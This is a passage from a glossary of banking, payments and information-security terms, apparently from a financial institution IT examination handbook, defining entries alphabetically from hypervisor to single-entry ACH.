Hypervisor - A piece of software that provides abstraction of all physical resources (such as central processing units, memory, network, and storage) and thus enables multiple computing stacks (consisting of an operating system, middleware, and application programs), called virtual machines, to be run on a single physical host.
I
I/O - Input/output.
IDS - Intrusion Detection System.
Image archive (Check 21) - Database for storage and easy retrieval of check images.
Image capture (Check 21) - The process of digitizing both sides of physical items and their associated MICR information as they are processed at the Federal Reserve Bank. Also includes storage of the images for up to 60 days.
Image exchange (Check 21) - Exchange of some or all of the digitized images of a check.
Implementation plan - A plan that details project management requirements and issues to be addressed during the period between the execution of an outsourcing agreement and the full production use of the outsourced services.
Incident management - The process of identifying, analyzing, and correcting disruptions to operations and preventing future recurrences. The goal of incident management is to limit the disruption and restore operations as quickly as possible.
Incident response plan - A plan that defines the action steps, involved resources, and communication strategy upon identification of a threat or potential threat event, such as a breach in security protocol, power or telecommunications outage, severe weather, or workplace violence.
Indemnifying bank (Check 21) - A financial institution that transfers, presents, or returns a substitute check or a paper or electronic representation of a substitute check for which it receives consideration. The financial institution shall indemnify the recipient and any subsequent recipient (including a collecting or returning financial institution, the depository financial institution, the drawer, the drawee, the payee, the depositor, and any endorser) for any loss incurred by any recipient of a substitute check if that loss occurred due to the receipt of a substitute check instead of the original.
Independence - Self-governance, freedom from conflict of interest and undue influence. The IT auditor should be free to make his or her own decisions, not influenced by the organization being audited or by its managers and employees.
Industry testing - A test designed to validate that business processes integrated across firms and within the financial industry support the business continuity objectives of the firms, both individually and collectively.
Information security - The process by which an organization protects the creation, collection, storage, use, transmission, and disposal of information.
Information systems - Electronic systems and physical components used to access, store, transmit, protect, and eventually dispose of information. Information systems can include networks (computer systems, connections to business partners and the Internet, and the interconnections between internal and external systems). Other examples are backup tapes, mobile devices, and other media.
Information technology - Any services or equipment, or interconnected system(s) or subsystem(s) of equipment, that comprise the institution’s IT architecture or infrastructure. It can include computers, ancillary equipment (including imaging peripherals, input, output, and storage devices necessary for security and surveillance), peripheral equipment designed to be controlled by the central processing unit of a computer, software, firmware and similar procedures, services (including cloud computing and help-desk services or other professional services which support any point of the life cycle of the equipment or service), and related resources.
Infrastructure - Describes what has been implemented by IT architecture and often includes support facilities such as power, cooling, ventilation, server and data redundancy and resilience, and telecommunications lines. Specific architecture types may exist for the following: enterprise, data (information), technology, security, and application.
Instruction - Means (i) any instruction submitted by a Member through the submission process directing CLS Bank to settle certain payment entitlements and obligations arising pursuant to an FX transaction eligible for settlement in CLS Bank and (ii) any instructions resulting from the split of Settlement Eligible Instructions.
Integrated services digital network (ISDN) -
Integrated test/exercise - This integrated test/exercise incorporates more than one component or module, as well as external dependencies, to test the effectiveness of the continuity plans for a business line or major function.
Integrity - Assurance that information is trustworthy and accurate; ensuring that information will not be accidentally or maliciously altered or destroyed (see “Data Integrity”).
Interbank checks - Checks that are not “on-us.” They are cleared and settled either by direct presentment, a clearinghouse association, a correspondent bank, or a Federal Reserve Bank.
Interchange - Exchange of transactions between financial institutions participating in a bank card network, based on a common set of rules. Card interchange allows a financial institution’s customers to use a bank credit card at any card-honoring merchant and to gain access to multiple ATM systems from a single ATM.
Interchange (fees) - Fees paid by one financial institution to another to cover handling costs and credit risk in a financial institution card transaction. Interchange fees generally flow toward the institution funding the transaction and assuming the risk. In a credit card transaction, the interchange fee is paid by the merchant acquirer accepting the merchant’s sales draft to the card-issuing institution, which, in turn, passes the fee to its merchants. In EFT/POS transactions, interchange flows in the opposite direction: the card-issuing institution (or customer) pays the fee to the terminal-owning institution. When a transaction is an off-line debit sale, the card-issuing institution collects an interchange fee from the merchant, rather than from the customer, unlike in an EFT/POS transaction, where the customer pays the interchange fee. Interchange revenue is derived from fees set by the card associations. Depending on the card association, fees can range from 1% to 3% of the value of the transaction. Interchange revenue is recognized as a card issuer’s second largest revenue line item.
Interconnectivity - The state or quality of being connected together. The interaction of a financial institution’s internal and external systems and applications and the entities with which they are linked.
Interdependencies - Where two or more departments, processes, functions, and/or third-party providers support one another in some fashion.
Interface - Computer programs that translate information from one system or application into a format required for use by another system or application.
Internet - A worldwide network of computer networks, governed by standards and protocols developed by the Internet Engineering Task Force (IETF).
Internet protocol (IP) - IP is a standard format for routing data packets between computers. IP is efficient, flexible, routable, and widely used with many applications, and is gaining acceptance as the preferred communication protocol.
Internet service provider (ISP) - A company that provides its customers with access to the Internet (e.g., AT&T, Verizon, CenturyLink).
Interoperability - The ability of a system to work with or use the parts or equipment of another system.
Interoperability standards/protocols - Commonly agreed-on standards that enable different computers or programs to share information. Example: HTTP (Hypertext Transfer Protocol) is a standard method of publishing information as hypertext in HTML format on the Internet.
Intrusion detection - Techniques that attempt to detect unauthorized entry or access into a computer or network by observation of actions, security logs, or audit data; detection of break-ins or attempts, either manually or via software expert systems that operate on logs or other information available on the network.
Intrusion detection system (IDS) - Software/hardware that detects and logs inappropriate, incorrect, or anomalous activity. IDSs are typically characterized based on the source of the data they monitor: host or network. A host-based IDS uses system log files and other electronic audit data to identify suspicious activity. A network-based IDS uses a sensor to monitor packets on the network to which it is attached.
Intrusion prevention systems (IPS) - A system that can detect an intrusive activity and can also attempt to stop the activity, ideally before it reaches its target.
IPv6 - Version 6 of the Internet Protocol.
ISAC - Information Sharing and Analysis Center.
iSCSI - Internet small computer system interface. An Internet Protocol based storage networking standard for linking data storage facilities. iSCSI is used to facilitate data transfers over intranets and to manage storage over long distances.
ISDN - Integrated systems digital networking. A hierarchy of digital switching and transmission systems that provides voice, data, and image in a unified manner. ISDN is synchronized so that all digital elements communicate in the same protocol at the same speed.
ISO - International Organization for Standards.
IT architecture - A subset of enterprise architecture, with detail to support data processing and access, including fundamental requirements for centralized or distributed computing, real or virtual servers, devices and workstations, and networking design. Architecture plans may also exist for data (information), security, and applications.
IT governance - An integral part of governance that consists of the leadership and organizational structures and processes that ensure that the institution’s IT sustains and extends the organization’s strategies and objectives.
IT strategic plan - A comprehensive blueprint that guides the organization’s technology management and contains high-level goals and plans for all areas of information technology that affect the business, not just the infrastructure. The plan should include areas that impact technology management, including cost management, human capital management, hardware and software management, third-party management, risk management, and all other considerations in the enterprise IT environment.
IT system inventory - A list containing information about the information resources owned or operated by an organization.
Iterative - Repetitive or cyclical. Iterative software development involves the completion of project tasks or phases in repetitive cycles. Tasks and phase activities are repeated until a desired result is achieved.
J
Jailbreaking - A method of removing the manufacturer’s device controls or core operating system controls to provide a user with additional access to and control over the device’s operating and file systems, including the ability to circumvent security controls.
K
Key fob - A small portable device equipped with chip technology allowing the holder to access network systems, such as those used for payments, and to store personal data.
Kiosk - A publicly accessible computer terminal that permits customers to directly communicate with the financial institution via a network.
L
LAN - Local Area Network.
LAR - Legal amount recognition. The handwritten dollar amount of the check.
Large value funds transfer system - A wholesale payment system used primarily by financial institutions in which large values of funds are transferred between parties. Fedwire® and CHIPS are the two large-value transfer systems in the United States.
Legacy systems - A term commonly used to refer to existing computer systems and applications with which new systems or applications must exchange information.
Life-cycle process - The multi-step process that starts with the initiation, analysis, design, and implementation, and continues through the maintenance and disposal of the system.
Lockbox - Deposit mechanism used by commercial firms and businesses to facilitate their deposit transaction volume. Typically, commercial firms and businesses direct customers to send payments directly to a financial institution address or post office box controlled by the institution. Financial institution personnel record payments received and prepare deposit slips, and subsequent processing proceeds as with other deposit-taking activities.
Lockout - The action of temporarily revoking network or application access privileges, normally due to repeated unsuccessful logon attempts.
Long position - In respect of a currency balance that is greater than zero, the amount by which such currency balance is greater than zero. A position that appreciates in value if market prices increase. When one buys a currency, their position is long.
M
Magnetic ink character recognition (MICR) - Magnetic codes found on the bottom of checks, deposit slips, and general ledger debit and credit tickets that allow a machine to scan (capture) the information. MICR encoding on a check includes the account number, the routing number, the serial number of the check, and the amount of the check. The amount of the check is encoded when the proof department processes the check.
Mainframe - An industry term for a large computer, typically used for the commercial applications of businesses and other large-scale computing purposes. Generally, a mainframe is associated with centralized rather than distributed computing.
Malware - Software designed to secretly access a computer system without the owner’s informed consent. The expression is a general term (short for malicious software) used to mean a variety of forms of hostile, intrusive, or annoying software or program code. Malware includes computer viruses, worms, trojan horses, spyware, dishonest adware, ransomware, crimeware, most rootkits, and other malicious and unwanted software or programs.
Man-in-the-middle attack - An attack that places the attacker’s computer in the communication line between the server and the client. The attacker’s machine can monitor and change communications.
Market-wide tests - Market-wide tests, also called cross-market tests or “street tests,” are sponsored by the Securities Industry Association, Bond Market Association, and Futures Industry Association. These tests validate the connectivity from alternate sites and include transaction, settlement, and payment processes, to the extent practical.
Matched instructions - Two Instructions in which the information set forth in a specific CLS Bank Rule is matched in accordance with the parameters and procedures set forth in the CLS Bank Rules.
Matching - With respect to compared and non-compared transactions, the process of comparing the trade or settlement details provided by counterparties to ensure they agree with respect to the terms of the transaction. Also called comparison checking.
Media - Physical objects that store data, such as paper, hard disk drives, tapes, and compact disks (CDs).
Merchant acquirer - Bankcard association members that initiate and maintain contractual agreements with merchants for the purpose of accepting and processing bankcard transactions.
Merchant processing - Activity for the acceptance and settlement of bankcard products and transactions from merchants through the payment system.
Metric - A quantitative measurement.
MICR - Magnetic ink character recognition. Magnetic codes found on the bottom of checks, deposit slips, and general ledger debit and credit tickets that allow a machine to scan (capture) the information. MICR encoding on a check includes the account number, the routing number, the serial number of the check, and the amount of the check. The amount of the check is encoded when the proof department processes the check.
Microwave technology - Narrowband technology that requires a direct line-of-sight to transmit voice and data communications and is used to integrate a broad range of fixed and mobile communication networks.
Midrange - Computers that are more powerful and capable than personal computers but less powerful and capable than mainframe computers.
Milestone - A major project event.
MIPS - Millions of instructions per second. A general measure of computing performance and, by implication, the amount of work a larger computer can do.
Mirroring - A process that copies data to multiple disks over a computer network in real time or close to real time. Mirroring reduces network traffic, ensures better availability of the website or files, or enables the site or downloaded files to arrive more quickly for users close to the mirror site.
MIS - Management information systems. A general term for the computer systems in an enterprise that provide information about its business operations.
Mnemonic - A symbol or expression that can help someone remember something. For example, the phrase “Hello! My name is Bill. I'm 9 years old.” might help an individual remember a secure 10-character password of “H!MniBI9yo.”
Mobile application - Downloadable software applications developed specifically for use on mobile devices. Mobile financial applications are developed by or for financial institutions to allow customers to perform account inquiries, retrieve information, or initiate financial transactions.
Mobile device - A portable computing and communications device with information-storage capability.
Mobile device security - Controls to protect against unauthorized access to, or activities through, portable computing and communications devices.
Mobile financial services - The products and services that a financial institution provides to its customers through mobile devices.
Mobile P2P - Payments initiated on a mobile device using the recipient’s mobile phone number, e-mail address, or other identifier.
Mobile payment - A transfer of value via a mobile device.
Mobile wallet - A front-end application that stores payment card information on the mobile device and allows payments to be made using a mobile device. The mobile wallet utilizes traditional retail payment channels such as ACH, EFT, and debit/credit card networks to process the payments.
Mobile-enabled Web sites - A Web site designed to detect the type of device the customer is using (e.g., mobile device or desktop computer) and display Web pages in the best format for that device.
Modeling - The process of abstracting information from tangible processes, systems, and/or components to create a paper or computer-based representation of an enterprise-wide or business line activity.
Module - A combination of various components of a business process or supporting system.
Module test/exercise - A test designed to verify the functionality of multiple components of a business line or supporting function at the same time.
Multi-factor authentication - The process of using two or more factors to achieve authentication. Factors include something you know (e.g., password or personal identification number); something you have (e.g., cryptographic identification device or token); and something you are (e.g., biometric).
Multilateral netting settlement system - Multilateral netting is an arrangement among three or more parties to net their obligations. In these settlement systems transfers are irrevocable but are only final after the completion of end-of-day settlement.
Multiplexers - A device that encodes or multiplexes information from two or more data sources into a single channel. They are used in situations where the cost of implementing separate channels for each data source is more expensive than the cost and inconvenience of providing the multiplexing/de-multiplexing functions.
N
NACHA – The Electronic Payments Association (NACHA) - The national association that establishes the rules and procedures governing the exchange of ACH payments.
NAS - Network attached storage. Hard disk storage set up with its own network address rather than being attached to the department computer that is serving applications to a network's workstation users. By removing storage access and its management from the department server, both application programming and files can be served faster because they are not competing for the same processor resources. The network-attached storage device is attached to a local area network (typically, an Ethernet network) and assigned an IP address. File requests are mapped by the main server to the NAS file server.
National Institute of Standards and Technology (NIST) - An agency of the U.S. Department of Commerce that works to develop and apply technology, measurements, and standards. NIST developed a voluntary cybersecurity framework based on existing standards, guidelines, and practices for reducing cyber risks to critical infrastructures.
National Settlement Service (NSS) - Also referred to as Deferred Net Settlement. The Federal Reserve Banks’ multilateral settlement service. NSS is offered to depository institutions that settle for participants in clearinghouses, financial exchanges, and other clearing and settlement groups. Settlement agents acting on behalf of those depository institutions electronically submit settlement files to the Federal Reserve Banks. Files are processed on receipt, and entries are automatically posted to the depository institutions’ Reserve Bank accounts. Entries are final when posted.
Near field communication (NFC) - A wireless protocol that allows for exchange of payment credentials stored on the mobile device and other data at close range.
Net debit cap - The maximum dollar amount of uncollateralized daylight overdrafts that an institution is authorized to incur in its Federal Reserve account. The net debit cap is generally equal to an institution’s capital times the cap multiple for its cap category.
Network - Two or more computer systems that are grouped together to share information, software, and hardware.
Network activity baseline - A base for determining typical utilization patterns so that significant deviations can be detected.
Network administrator - The individual responsible for the installation, management, and control of a network.
Network attached storage (NAS) - NAS systems usually contain one or more hard disks that are arranged into logical, redundant storage containers much like traditional file servers. NAS provides readily available storage resources and helps alleviate the bottlenecks associated with access to storage devices.
Network diagram - A description of any kind of locality in terms of its physical layout. In the context of communication networks, a topology describes pictorially the configuration or arrangement of a network, including its nodes and connecting communication lines.
Network security - The protection of computer networks and their services from unauthorized entry, modification, destruction, or disclosure, and provision of assurance that the network performs its critical functions correctly and that there are no harmful side effects. Network security includes providing for data integrity.
Non-repudiation - Ensuring that a transferred message has been sent and received by the parties claiming to have sent and received the message. Non-repudiation is a way to guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message.
O
Object code - Software program instructions compiled (translated) from source code into machine-readable formats.
Object Program - A program that has been translated into machine language and is ready to be run (i.e., executed) by the computer.
Office of Foreign Asset Control (OFAC) - The Office of Foreign Assets Control, United States Department of the Treasury, administers and enforces economic sanctions programs primarily against countries and groups of individuals such as terrorists and narcotics traffickers. The sanctions can be either comprehensive or selective, using the blocking of assets and trade restrictions to accomplish foreign policy and national security goals.
Offsite rotation - Used for backup and/or disaster recovery; moving a copy of the most current database, information, file, or tape to an offsite storage facility to be used only in an emergency.
One-time password - A password that is valid for only one login session or transaction on a computer system or other digital device.
On-us checks - Checks that are deposited into the same institution on which they are drawn.
Open market operations - The buying and selling of government securities in the open market in order to expand or contract the amount of money in the banking system.
Operating system - A system that supports and manages software applications. Operating systems allocate system resources, provide access and security controls, maintain file systems, and manage communications between end users and hardware devices.
Operational IT plan - Typically, the plans that are made by front-line, or low-level, IT managers. Operational IT plans are focused on the specific procedures and processes that implement the larger strategic plan.
Operational risk - The risk of failure or loss resulting from inadequate or failed processes, people, or systems.
Originating depository financial institution (ODFI) - A participating financial institution that originates entries at the request of and by agreement with its originators in accordance with the provisions of the NACHA rules.
Originator - A person that has authorized an ODFI to transmit a credit or debit entry to the deposit account of a receiver at an RDFI.
Outsourcing - The practice of contracting with another entity to perform services that might otherwise be conducted in-house. Contracted relationship with a third party to provide services, systems, or support.
OWASP - An online community dedicated to Web application security.
P
P2P - Peer-to-peer communication, the communications that travel from one user’s computer to another user’s computer without being stored for later access on a server. E-mail is not a P2P communication since it travels from the sender to a server and is retrieved by the recipient from the server. On-line chat, however, is a P2P communication since messages travel directly from one user to another.
Pandemic - An epidemic or infectious disease that can have a worldwide impact.
Passwords - A secret sequence of characters that is used as a means of authentication.
Patch - Software code that replaces or updates other code. Frequently patches are used to correct security flaws.
Patching - Software code that replaces or updates other code.
Frequently patches are used to correct security flaws.Paying bank - A paying bank is the institution where a check is payable and to which it is sent for payment.Payment - A transfer of value.Payment system - The mechanism, the rules, institutions, people, markets, and agreements that make the exchange of payments possible.Payments System Risk Policy (PSR) - The Federal Reserve’s Payments System Risk (PSR) policy addressing the risks that payment systems present to the Federal Reserve Banks, the banking system, and to other sectors of the economy. Payroll card account - A bank account that is established directly or indirectly by an employer on behalf of an employee to which an electronic funds transfers the employee’s wages or compensation on a recurring basis. The payroll card, often branded by one of the credit/debit card associations, provides the employee access to the funds. PBX - Private branch exchange. A telephone system within an enterprise that switches calls between enterprise users on local lines while allowing all users to share a certain number of external phone lines.PCI Security Standards Council - The governing body, representing key participants of the payment card industry, which establishes and maintains security standards for payment cards.Penetration test - The process of using approved, qualified personnel to conduct real-world attacks against a system to identify and correct security weaknesses before they are discovered and exploited by others. Permanent virtual circuit (PVC) - PVC is a pathway through a network that is predefined and maintained by the end systems and nodes along the circuit, but the actual pathway through the network may change due to routing problems. The PVC is a fixed circuit that is defined in advance by the public network carrier. 
Refer to switched virtual circuit for an additional virtual circuit option.Personal digital assistant (PDA) - A pocket-sized, special-purpose personal computer that lacks a conventional keyboard.Person-to-person (P2P) payment - Online payments using electronic mail messages to invoke a transfer of value between the parties over existing proprietary networks as on-us transactions.Phase - A project segment.Phishing - A digital form of social engineering that uses authentic-looking — but bogus — e-mail to request information from users or direct them to fake Web sites that request information.Platform - The underlying computer system on which applications programs run. A platform consists of an operating system, the computer system's coordinating program, which in turn is built on the instruction set for a processor or microprocessor, and the hardware that performs logic operations and manages data movement in the computer. POD - Proof of deposit. The verification of the dollar amount written on a negotiable instrument being deposited. Point-of-sale (POS) network - A network of institutions, debit cardholders, and merchants that permit consumers to make direct payment electronically at the place of purchase. The funds are withdrawn from the account of the cardholder.Pop-up box - A dialog box that automatically appears when a person accesses a webpage.Port - Either an endpoint to a logical connection or a physical connection to a computer.POTS - Plain old telephone system. Basic telephone service.Presentment fee - A fee that an institution receiving a check may impose on the institution that presents the check for payment. No presentment fee may be charged for checks presented by 8 a.m. 
local time.Preventive control - A mitigating technique designed to prevent an event from occurring.Principle of least privilege - The security objective of granting users only the access needed to perform official duties.Private key infrastructure (PKI) - The use of public key cryptography in which each customer has a key pair (e.g., a unique electronic value called a public key and a mathematically-related private key). The private key is used to encrypt (sign) a message that can only be decrypted by the cor-responding public key or to decrypt a message previously encrypted with the public key. The public key is used to decrypt a message previously encrypted (signed) using an individual's private key or to encrypt a message so that it can only be decrypted (read) using the intended recipient’s private key. Private label card - See "Store Card".Privileged access - Individuals with the ability to override system or application controls.Project - A task involving the acquisition, development, or maintenance of a technology product.Project management - Planning, monitoring, and controlling an activity.Protocol - A format for transmitting data between devices.Protocol "2" - A standard way of carrying out data transmission between
computers.Proxy server - An Internet server that controls client computers’ access to the Internet. Using a proxy server, a company can stop employees from accessing undesirable websites, improve performance by storing webpages locally, and hide the internal network's identity so monitoring is difficult for external users.Public key - See "PKI".QQR code - A type of two-dimensional bar code or machine-readable optical label that contains information about the item to which it is attached.RRAID - Redundant array of independent disks. The use of multiple hard disks to store the same data in different places. By placing data on multiple disks, I/O operations can overlap in a balanced way, improving performance. Since multiple disks increase the mean time between failures (MTBF), storing data redundantly also increases fault-tolerance. Real time gross settlement (RTGS) System - A type of payments system operating in real time rather than batch processing mode. It provides immediate finality of transactions. Gross settlement refers to the settlement of each transfer individually rather than netting. FedwireÒ is an example of a real time gross settlement system.Real-time network monitoring - Immediate response to a penetration attempt that is detected and diagnosed in time to prevent access.Receiver - An individual, corporation, or other entity that has authorized a company or an originator to initiate a credit or debit entry to a transaction account belonging to the receiver held at its RDFI.Receiving depository financial institution (RDFI) - Any financial institution qualified to receive debits or credits through its ACH operator in accordance with the ACH rules.Reciprocal agreement - An agreement whereby two organizations with similar computer systems agree to provide computer processing time for the other in the event one of the systems is rendered inoperable. 
Processing time may be provided on a “best effort” or as “time available” basis; therefore, reciprocal agreements are not usually acceptable as a primary recovery option.Reconverting bank (Check 21) - The financial institution that creates a substitute check. With respect to a substitute check that was created by a person that is not a financial institution, the reconverting bank is the first financial institution that transfers, presents, or returns that substitute check or, in lieu thereof, the first paper or electronic representation of that substitute check. The reconverting bank warrants that (1) the substitute check is the legal equivalent of the original check; and (2) the original check cannot be presented again in any form so the customer pays the check only once.Recovery point objective (RPO) - The amount of data that can be lost without severely impacting the recovery of operations or the point in time in which systems and data must be recovered (e.g., the date and time of a business disruption).Recovery point objectives (RPOs) - RPOs represent the amount of data that can be lost without severely impacting the recovery of operations or the point in time in which systems and data must be recovered (e.g., the date and time of a business disruption). Recovery service levels - Collectively, terms that define the speed, quality, and quantity of recovery capability in response to a disaster, including recovery time objective, recovery point objective, timely notification, percentage of normal production service level agreements (SLAs) that will be delivered during recovery mode, etc.Recovery site - An alternate location for processing information (and possibly conducting business) in an emergency. 
Usually distinguished as “hot” sites that are fully configured centers with compatible computer equipment and “cold” sites that are operational computer centers without the computer equipment.Recovery time objective (RTO) - The maximum allowable downtime that can occur without severely impacting the recovery of operations or the time in which systems, applications, or business functions must be recovered after an outage (e.g. the point in time that a process can no longer be inoperable). Recovery time objectives (RTOs) - RTOs represent the maximum allowable downtime that can occur without severely impacting the recovery of operations or the time in which systems, applications, or business functions must be recovered after an outage (e.g. the point in time that a process can no longer be inoperable). Recovery vendors - Organizations that provide recovery sites and support services for a fee. Red team - A group of people authorized and organized to emulate a potential adversary’s attack or exploitation capabilities against an enterprise’s security posture. The red team’s objective is to improve enterprise information assurance by demonstrating the impacts of successful attacks and by demonstrating what works for the defenders in an operational environment.Regulation CC - A regulation (12 CFR 229) promulgated by the Board of Governors of the Federal Reserve System regarding the availability of funds and the collection of checks. The regulation governs the availability of funds deposited in checking accounts and the collection and return of checks.Regulation E - A regulation (12 CFR 205) promulgated by the Board of Governors of the Federal Reserve System to ensure consumers a minimum level of protection in disputes arising from electronic fund transfers.Regulation Z - Regulation Z, the Truth in Lending Act (TILA) (12 CFR 226) promulgated by the Board of Governors of the Federal Reserve System. 
The regulation prescribes uniform methods for computing the cost of credit, disclosing credit terms, and resolving errors on certain types of credit accounts.Remittance cards - Payment cards that are typically used to facilitate cross-border movement of funds by individuals and for person-to-person transactions.Remote access - The ability to obtain access to a computer or network from a remote location.Remote capture - Process that is used to scan and transmit check images and data electronically.Remote control software - Software that is used to obtain access to a computer or network from a remote distance.Remote deposit capture (RDC) - A service that enables users at remote locations to scan digital images of checks and transmit the captured data to a financial institution or a merchant that is a customer of a financial institution.Remote journaling - Process used to transmit journal or transaction logs in real time to a back-up location.Remotely created check (RCC) - A check that is drawn on a customer account at a financial institution, is created by the payee, and does not bear a signature in the format agreed to by the paying financial institution and customer. RCCs are also known as “demand drafts,” “telechecks,” “preauthorized drafts,” “paper drafts,” or “digital checks.” Removable media - Portable electronic storage media, such as magnetic, optical, and solid-state devices, which can be inserted into and removed from a computing device and which is used to store text, video, audio, and image information. Such devices have no independent processing capabilities. 
Examples include hard disks, floppy disks, zip drives, compact disks (CD), thumb drives, pen drives, and similar storage devices.Replay attack - The interception of communications, such as an authentication communication, and subsequently impersonation of the sender by retransmitting the intercepted communication.Repudiation - The denial by one of the parties to a transaction of participation in all or part of that transaction or of the content of the communication.Reserve account - A non-interest-earning balance account institutions maintain with the Federal Reserve Bank or with a correspondent bank to satisfy the Federal Reserve’s reserve requirements. Reserve account balances play a central role in the exchange of funds between depository institutions.Reserve requirements - The percentage of deposits that a depository institution may not lend out or invest and must hold either as vault cash or on deposit at a Federal Reserve Bank. Reserve requirements affect the potential of the banking system to create transaction deposits.Residual risk - The amount of risk remaining after the implementation of controls.Resilience - The ability of an institution to recover from a significant disruption and resume critical operations.Resilience testing - Testing of an institution’s business continuity and disaster recovery resumption plans.Retail payments - Payments, typically small, made in the goods and services market.Retention requirement - Requirement established by a company or by regulation for the length of time and/or for the amount of information that should be retained.Return (ACH) - Any ACH entry that has been returned to the ODFI by the RDFI or by the ACH operator because it cannot be processed. 
The reason for each return is included with the return in the form of a “return reason code.” (See the NACHA “Operating Rules and Guidelines” for a complete reason code listing.)Risk - The potential that events, expected or unanticipated, may have an adverse effect on a financial institution’s earnings, capital, or reputation.Risk analysis - The process of identifying risks, determining their probability and impact, and identifying areas needing safeguards; Risk analysis is an integral part of risk management.Risk assessment - A prioritization of potential business disruptions based on severity and likelihood of occurrence. The risk assessment includes an analysis of threats based on the impact to the institution, its customers, and financial markets, rather than the nature of the threat. Risk identification - The process of determining risks and existing safeguards. It generally includes inventories of systems and information necessary to operations and defines the potential threats to systems and operations.Risk management - The total process required to identify, control, and minimize the impact of uncertain events. The objective of a risk management program is to reduce risk and obtain and maintain appropriate management approval at predefined stages in the life cycle.Risk measurement - A process to determine the likelihood of an adverse event or threat occurring and the potential impact of such an event on the institution. The result of risk measurement leads to the prioritization of potential risks based on severity and likelihood of occurrence. Risk mitigation - The process of reducing risks through the introduction of specific controls and risk transfer. It includes the implementation of appropriate controls to reduce the potential for risk and bring the level of risk in line with the board’s risk appetite.Rlogin - Remote login. 
A UNIX utility that allows a user to login to a remote host on a network, as if it were directly connected, and make use of various services. Remote login is an information exchange between network-connected devices where the information cannot be reliably protected end-to-end by a single organization’s security controls. Rogue code - In programming, rogue code is another term for code that constitutes a virus.Rogue wireless access - An unauthorized wireless node on a network.Root user - The conventional name of the user who has all rights or permissions to all files and programs. Having such rights or permissions allow the root user to do many things an ordinary user cannot.Router - A hardware device that connects two or more networks and routes incoming data packets to the appropriate network.Routing - The process of moving information from its source to the destination.Routing number - Also referred to as the ABA number. A nine-digit number (eight digits and a check digit) that identifies a specific financial institution.SSandbox - A restricted, controlled execution environment that prevents potentially malicious software, such as mobile code, from accessing any system resources except those for which the software is authorized. SAS 70 report - An audit report of a servicing institution prepared in accordance with guidance provided in the American Institute of Certified Public Accountant's Statement of Auditing Standards Number 70.Satellite technology - These links efficiently extend the reach of typical communication systems to distant areas and provide alternative traffic routing in an emergency.Scalability - A term that refers to how well a hardware and software system can adapt to increased demands. For example, a scalable network system would be one that can start with just a few nodes but can easily expand to thousands of nodes. 
Scalability can be a very important feature because it means the entity can invest in a system with confidence they will not quickly outgrow it. Scenario analysis - The process of analyzing possible future events by considering alternative possible outcomes.Scorecard - A dashboard of performance measures.Script - A file containing active content; for example, commands or instructions to be executed by the computer.SCSI - Small computer systems interface (pronounced ”scuzzy”). A standard way of interfacing a computer to disk drives, tape drives, and other devices that require high-speed data transfer. Also, a secondary SAN protocol that allows computer applications to talk to storage devices.SDLC - Systems development life cycle. The stages through which software evolves from an idea to implementation.Secure coding techniques - The process of developing code (e.g., Web application) with security built in during the development process using technical controls to mitigate the occurrence of software vulnerabilities.Security architecture - A detailed description of all aspects of the system that relate to security, along with a set of principles to guide the design. A security architecture describes how the system is put together to satisfy the security requirements.Security Audit - An independent review and examination of system records and activities to test for adequacy of system controls, ensure compliance with established policy and operational procedures, and recommend any indicated changes in control, policy, and procedures.Security breach - A security event that results in unauthorized access of data, applications, services, networks, or devices by bypassing underlying security mechanisms. 
Security event - An event that potentially compromises the confidentiality, integrity, availability, or accountability of an information system.
Security log - A record that contains login and logout activity and other security-related events and that is used to track security-related information on a computer system.
Security posture - The security status of an enterprise's networks, information, and systems based on information security and assurance resources (e.g., people, hardware, software, and policies) and capabilities in place to manage the defense of the enterprise and to react as the situation changes.
Security procedure agreement - An agreement between a financial institution and a Federal Reserve Bank whereby the financial institution agrees to certain security procedures if it uses an encrypted communications line with access controls for the transmission or receipt of a payment order to or from a Federal Reserve Bank.
Security violation - An instance in which a user or other person circumvents or defeats the controls of a system to obtain unauthorized access to information or system resources.
Sensitive customer information - A customer's name, address, or telephone number, in conjunction with the customer's social security number, driver's license number, account number, credit or debit card number, or a personal identification number or password that would permit access to the customer's account. Sensitive customer information also includes any combination of components of customer information that would allow someone to log onto or access the customer's account, such as user name and password or password and account number.
Server - A computer or other device that manages a network service. An example is a print server, which is a device that manages network printing.
Service level agreement (SLA) - Formal documents between an institution and its third-party provider that outline an institution's predetermined requirements for a service and establish incentives to meet, or penalties for failure to meet, the requirements. SLAs should specify and clarify performance expectations, establish accountability, and detail remedies or consequences if performance or service quality standards are not met.
Service level agreement (SLA) - Formal documents that outline the institution's predetermined requirements for the service and establish incentives to meet, or penalties for failure to meet, the requirements. They should specify and clarify performance expectations, establish accountability, and detail remedies or consequences if performance or service quality standards are not met.
Service provider - Also referred to as a technology service provider (TSP). Any of a broad range of entities, including affiliated entities, non-affiliated entities, and alliances of companies, that provide products and services. Other terms used to describe service providers include vendors, subcontractors, external service providers, application service providers, and outsourcers.
Settlement - The final step in the transfer of ownership involving the physical exchange of securities or payment. In a banking transaction, settlement is the process of recording the debit and credit positions of the parties involved in a transfer of funds. In a financial instrument transaction, settlement includes both the transfer of securities by the seller and the payment by the buyer. Settlements can be "gross" or "net." Gross settlement means each transaction is settled individually. Net settlement means parties exchanging payments will offset mutual obligations to deliver identical items (e.g., dollars or euros) at a specified time, after which only one net amount of each item is exchanged.
Settlement date (ACH) - The date on which an exchange of funds with respect to an entry is reflected on the books of the Federal Reserve Bank.
Settlement eligible instructions - See "Matched instructions".
Short message service (SMS) - A text messaging service component of phone, Web, or mobile communication systems. SMS uses standardized communications protocols to allow devices to exchange short text messages. Also known as text messaging.
Short position - In respect of a currency balance that is less than zero, the amount by which such currency balance is less than zero. An investment position that benefits from a decline in market price. When one sells a currency, their position is short.
Short position limit - In respect of an eligible currency, the maximum short position a Settlement Member may have at any time in that eligible currency, which, unless otherwise reduced pursuant to the CLS Bank Rules, shall equal (i) the total amount of all available committed liquidity facilities in such eligible currency (or such lesser amount that CLS Bank may determine from time to time) minus (ii) the amount of the largest available committed liquidity facility among such liquidity facilities (after taking into account any amounts already drawn).
Significant firms - Firms that process a significant share of transactions in critical financial markets.
Simulated loss of data center site(s) test/exercise - A type of disaster recovery test that involves the simulation of the loss of the primary, alternate, and/or tertiary data processing sites to verify that the institution can continue its data processing activities.
Simulation - The process of operating a model of an enterprise-wide or business line activity in order to test the functionality of the model. Computer systems may support the simulation of business models to aid in evaluating the BCP.
Single-entry (ACH) - A one-time transfer of funds initiated by an originator in accordance with the receiver's authorization for a single ACH credit or debit to the receiver's consumer account.
